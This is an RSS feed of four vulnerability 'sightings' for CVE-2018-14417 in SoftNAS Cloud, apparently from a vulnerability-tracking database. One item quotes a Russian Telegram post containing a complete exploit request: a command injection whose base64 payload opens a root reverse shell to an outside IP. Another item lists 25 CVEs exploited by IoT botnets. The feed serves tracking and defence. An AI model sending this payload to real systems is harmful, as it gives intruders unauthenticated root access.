<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://db.gcve.eu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 02 May 2026 18:13:37 +0000</lastBuildDate>
    <item>
      <title>87698b85-56b8-446a-b83a-107af0822a95</title>
      <link>https://db.gcve.eu/sighting/87698b85-56b8-446a-b83a-107af0822a95/export</link>
      <description>{"uuid": "87698b85-56b8-446a-b83a-107af0822a95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "exploited", "source": "https://www.exploit-db.com/exploits/45097", "content": "", "creation_timestamp": "2018-07-27T00:00:00.000000Z"}</description>
      <content:encoded>{"uuid": "87698b85-56b8-446a-b83a-107af0822a95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "exploited", "source": "https://www.exploit-db.com/exploits/45097", "content": "", "creation_timestamp": "2018-07-27T00:00:00.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/87698b85-56b8-446a-b83a-107af0822a95/export</guid>
      <pubDate>Fri, 27 Jul 2018 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>d898aa6b-b2cf-4334-9e6c-53dc16d9a770</title>
      <link>https://db.gcve.eu/sighting/d898aa6b-b2cf-4334-9e6c-53dc16d9a770/export</link>
      <description>{"uuid": "d898aa6b-b2cf-4334-9e6c-53dc16d9a770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "seen", "source": "https://t.me/VulnerabilityNews/262", "content": "#0daytoday #SoftNAS Cloud OS Command Injection Vulnerability CVE-2018-14417 [webapps #exploits #Vulnerability #0day #Exploit]\nRead More", "creation_timestamp": "2018-07-27T11:12:13.000000Z"}</description>
      <content:encoded>{"uuid": "d898aa6b-b2cf-4334-9e6c-53dc16d9a770", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "seen", "source": "https://t.me/VulnerabilityNews/262", "content": "#0daytoday #SoftNAS Cloud OS Command Injection Vulnerability CVE-2018-14417 [webapps #exploits #Vulnerability #0day #Exploit]\nRead More", "creation_timestamp": "2018-07-27T11:12:13.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/d898aa6b-b2cf-4334-9e6c-53dc16d9a770/export</guid>
      <pubDate>Fri, 27 Jul 2018 11:12:13 +0000</pubDate>
    </item>
    <item>
      <title>85b7a643-25c7-44a6-a8a0-cf074d3e4ae3</title>
      <link>https://db.gcve.eu/sighting/85b7a643-25c7-44a6-a8a0-cf074d3e4ae3/export</link>
      <description>{"uuid": "85b7a643-25c7-44a6-a8a0-cf074d3e4ae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "published-proof-of-concept", "source": "https://t.me/antichat/1868", "content": "#exploit #\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\n\n\u0414\u043e\u0441\u0442\u0443\u043f \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0432 SoftNAS Cloud \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.0.3\n\n\u0412\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0430\u043c SoftNAS Cloud \u043e\u0447\u0435\u043d\u044c \u043d\u0435 \u043f\u043e\u043c\u0435\u0448\u0430\u043b\u043e \u0431\u044b \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e 4.0.3. \u0412 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430\u0448\u043b\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 (CVE-2018-14417), \u043d\u043e \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442. \u041f\u043e \u043f\u0440\u0438\u043b\u0438\u0447\u043d\u043e\u043c\u0443 - \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0430 \u043f\u0430\u0442\u0447\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u041e\u0421. \u0421 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f apache. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 SoftNAS Cloud \u043e\u043d \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0441\u0443\u0434\u043e:\n\n# Once SoftNAS UI is operational, only allow the specific command that require sudo access!!\nCmnd_Alias      SOFTNAS = ALL\nAPACHE  ALL = (ALL) NOPASSWD: SOFTNAS\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0441\u0440\u0430\u0437\u0443 \u0440\u0443\u0442\u043e\u0432\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0432\u0438\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 bash \u0441 \u0440\u0443\u0442\u043e\u0432\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438:\n\nGET /softnas/snserver/snserv.php?opcode=checkupdate&amp;amp;opcode=executeupdate&amp;amp;selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&amp;amp;update_type=standard&amp;amp;recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1\nHost: 10.2.45.208\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.2.45.208/softnas/applets/update/\nX-Requested-With: XMLHttpRequest\nConnection: close\n\n\u041a\u0430\u043f\u0435\u043b\u044c\u043a\u0443 \u0431\u043e\u043b\u044c\u0448\u0435 \u0438\u043d\u0444\u044b: https://www.exploit-db.com/exploits/45097/", "creation_timestamp": "2018-08-02T11:00:37.000000Z"}</description>
      <content:encoded>{"uuid": "85b7a643-25c7-44a6-a8a0-cf074d3e4ae3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "published-proof-of-concept", "source": "https://t.me/antichat/1868", "content": "#exploit #\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\n\n\u0414\u043e\u0441\u0442\u0443\u043f \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0432 SoftNAS Cloud \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.0.3\n\n\u0412\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u0438 \u0430\u0434\u043c\u0438\u043d\u0430\u043c SoftNAS Cloud \u043e\u0447\u0435\u043d\u044c \u043d\u0435 \u043f\u043e\u043c\u0435\u0448\u0430\u043b\u043e \u0431\u044b \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e 4.0.3. \u0412 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430\u0448\u043b\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 (CVE-2018-14417), \u043d\u043e \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442. \u041f\u043e \u043f\u0440\u0438\u043b\u0438\u0447\u043d\u043e\u043c\u0443 - \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0430 \u043f\u0430\u0442\u0447\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0432\u0435\u0431-\u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u041e\u0421. \u0421 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f apache. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 SoftNAS Cloud \u043e\u043d \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u043d\u0430 \u0441\u0443\u0434\u043e:\n\n# Once SoftNAS UI is operational, only allow the specific command that require sudo access!!\nCmnd_Alias      SOFTNAS = ALL\nAPACHE  ALL = (ALL) NOPASSWD: SOFTNAS\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0441\u0440\u0430\u0437\u0443 \u0440\u0443\u0442\u043e\u0432\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0432\u0438\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 bash \u0441 \u0440\u0443\u0442\u043e\u0432\u044b\u043c\u0438 \u043f\u0440\u0430\u0432\u0430\u043c\u0438:\n\nGET /softnas/snserver/snserv.php?opcode=checkupdate&amp;amp;opcode=executeupdate&amp;amp;selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&amp;amp;update_type=standard&amp;amp;recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1\nHost: 10.2.45.208\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.2.45.208/softnas/applets/update/\nX-Requested-With: XMLHttpRequest\nConnection: close\n\n\u041a\u0430\u043f\u0435\u043b\u044c\u043a\u0443 \u0431\u043e\u043b\u044c\u0448\u0435 \u0438\u043d\u0444\u044b: https://www.exploit-db.com/exploits/45097/", "creation_timestamp": "2018-08-02T11:00:37.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/85b7a643-25c7-44a6-a8a0-cf074d3e4ae3/export</guid>
      <pubDate>Thu, 02 Aug 2018 11:00:37 +0000</pubDate>
    </item>
    <item>
      <title>ecfb4f73-7fce-4561-bf7c-a38bac4cc395</title>
      <link>https://db.gcve.eu/sighting/ecfb4f73-7fce-4561-bf7c-a38bac4cc395/export</link>
      <description>{"uuid": "ecfb4f73-7fce-4561-bf7c-a38bac4cc395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/107", "content": "#Analytics\n25 vulnerabilities/exploits used by IoT Botnet (Mirai, Qbot, Gafygt etc.)\n1. CVE-2015-2280: AirLink101 IPCam 1620W OS CI\n2. CVE-2017-17215: Huawei Router HG532 Arbitrary Command Execution\n3. CVE-2018-10561, CVE-2018-10562 - GPON Routers Auth Bypass/Command Injection\n4. CVE-2018-14417: SoftNAS Cloud &amp;lt;4.0.3 OS CI\n5. CVE-2014-8361: Realtek SDK Miniigd UPnP SOAP Command Execution\n6. CVE-2017-5638: Apache Struts 2.x RCE\n7. CVE-2018-9866: SonicWall SMS RCE\n8. CVE-2017-6884: Zyxel EMG2926 OS CI\n9. CVE-2015-2051: HNAP SoapAction Header Command Execution\n10. CVE-2008-4873: Sepal SPBOARD 4.5 - \"board.cgi\" RCE\n11. CVE-2016-6277: NETGEAR R7000 - CI\n12. D-Link DSL-2750B - OS CI\n13. CAM Wireless IP Camera - Unauth RCE\n14. Eir D1000 Wireless Router - WAN Side RCI\n15. TUTOS 1.3 \"cmd.php\" RCE\n16. WP Plugin DZS-VideoGallery - CSS/CI\n17. Netgear DGN1000 - Setup.cgi RCE\n18. Web Attack (CCTV-DVR RCE)\n19. MVPower DVR TV-7104HE - Shell Command Execution\n20. Vacron NVR RCE\n21. Linksys E-series - RCE\n22. D-Link command.php RCE\n23. EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - RCE\n24. AVTech IP Camera/NVR/DVR Devices - Multiple Vulns\n25. NetGain \"ping\" Command Injection", "creation_timestamp": "2024-10-11T09:08:41.000000Z"}</description>
      <content:encoded>{"uuid": "ecfb4f73-7fce-4561-bf7c-a38bac4cc395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2018-14417", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/107", "content": "#Analytics\n25 vulnerabilities/exploits used by IoT Botnet (Mirai, Qbot, Gafygt etc.)\n1. CVE-2015-2280: AirLink101 IPCam 1620W OS CI\n2. CVE-2017-17215: Huawei Router HG532 Arbitrary Command Execution\n3. CVE-2018-10561, CVE-2018-10562 - GPON Routers Auth Bypass/Command Injection\n4. CVE-2018-14417: SoftNAS Cloud &amp;lt;4.0.3 OS CI\n5. CVE-2014-8361: Realtek SDK Miniigd UPnP SOAP Command Execution\n6. CVE-2017-5638: Apache Struts 2.x RCE\n7. CVE-2018-9866: SonicWall SMS RCE\n8. CVE-2017-6884: Zyxel EMG2926 OS CI\n9. CVE-2015-2051: HNAP SoapAction Header Command Execution\n10. CVE-2008-4873: Sepal SPBOARD 4.5 - \"board.cgi\" RCE\n11. CVE-2016-6277: NETGEAR R7000 - CI\n12. D-Link DSL-2750B - OS CI\n13. CAM Wireless IP Camera - Unauth RCE\n14. Eir D1000 Wireless Router - WAN Side RCI\n15. TUTOS 1.3 \"cmd.php\" RCE\n16. WP Plugin DZS-VideoGallery - CSS/CI\n17. Netgear DGN1000 - Setup.cgi RCE\n18. Web Attack (CCTV-DVR RCE)\n19. MVPower DVR TV-7104HE - Shell Command Execution\n20. Vacron NVR RCE\n21. Linksys E-series - RCE\n22. D-Link command.php RCE\n23. EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - RCE\n24. AVTech IP Camera/NVR/DVR Devices - Multiple Vulns\n25. NetGain \"ping\" Command Injection", "creation_timestamp": "2024-10-11T09:08:41.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/ecfb4f73-7fce-4561-bf7c-a38bac4cc395/export</guid>
      <pubDate>Fri, 11 Oct 2024 09:08:41 +0000</pubDate>
    </item>
  </channel>
</rss>
